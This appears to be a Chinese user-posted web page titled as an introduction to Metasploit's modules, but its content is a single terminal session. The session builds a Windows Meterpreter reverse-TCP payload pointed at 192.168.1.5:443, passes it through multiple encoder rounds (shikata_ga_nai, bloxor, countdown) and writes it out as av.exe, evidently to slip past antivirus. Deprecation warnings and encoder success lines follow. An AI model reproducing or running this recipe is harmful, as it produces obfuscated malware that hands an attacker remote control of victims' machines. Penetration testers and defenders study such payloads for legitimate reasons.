分享

Metasploit的模块构成及功能介绍

 咣当的文库 2015-06-13
exploit@ubuntu:/pentest/framework3$ msfpayload 
windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | 
msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/bloxor -c
 3 -t raw | msfencode -e x86/countdown -c 5 -t exe -o av.exe[!] 
************************************************************************[!]
  
************************************************************************[!]
  
************************************************************************[!] *               The utility msfencode is deprecated!                   *[!] *              It will be removed on or about 2015-06-08               *[!] *                   Please use msfvenom instead                        *[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *[!] ************************************************************************
[!] *               The utility msfencode is deprecated!                   *[!] *              It will be removed on or about 2015-06-08               *[!] *                   Please use msfvenom instead                        *[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *[!] ************************************************************************
[!] *               The utility msfpayload is deprecated!                  *[!] *              It will be removed on or about 2015-06-08               *[!] *                   Please use msfvenom instead                        *[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *[!] ************************************************************************[!] ************************************************************************[!] *               The utility msfencode is deprecated!                   *[!] *              It will be removed on or about 2015-06-08               *[!] *                   Please use msfvenom instead                        *[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *[!] ************************************************************************[*] x86/shikata_ga_nai succeeded with size 308 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 335 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 362 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 389 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 416 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 443 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 470 (iteration=7)
[*] x86/bloxor succeeded with size 547 (iteration=1)
[*] x86/bloxor succeeded with size 617 (iteration=2)
[*] x86/bloxor succeeded with size 677 (iteration=3)
[*] x86/countdown succeeded with size 695 (iteration=1)
[*] x86/countdown succeeded with size 713 (iteration=2)
[*] x86/countdown succeeded with size 731 (iteration=3)
[*] x86/countdown succeeded with size 749 (iteration=4)
[*] x86/countdown succeeded with size 767 (iteration=5)

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多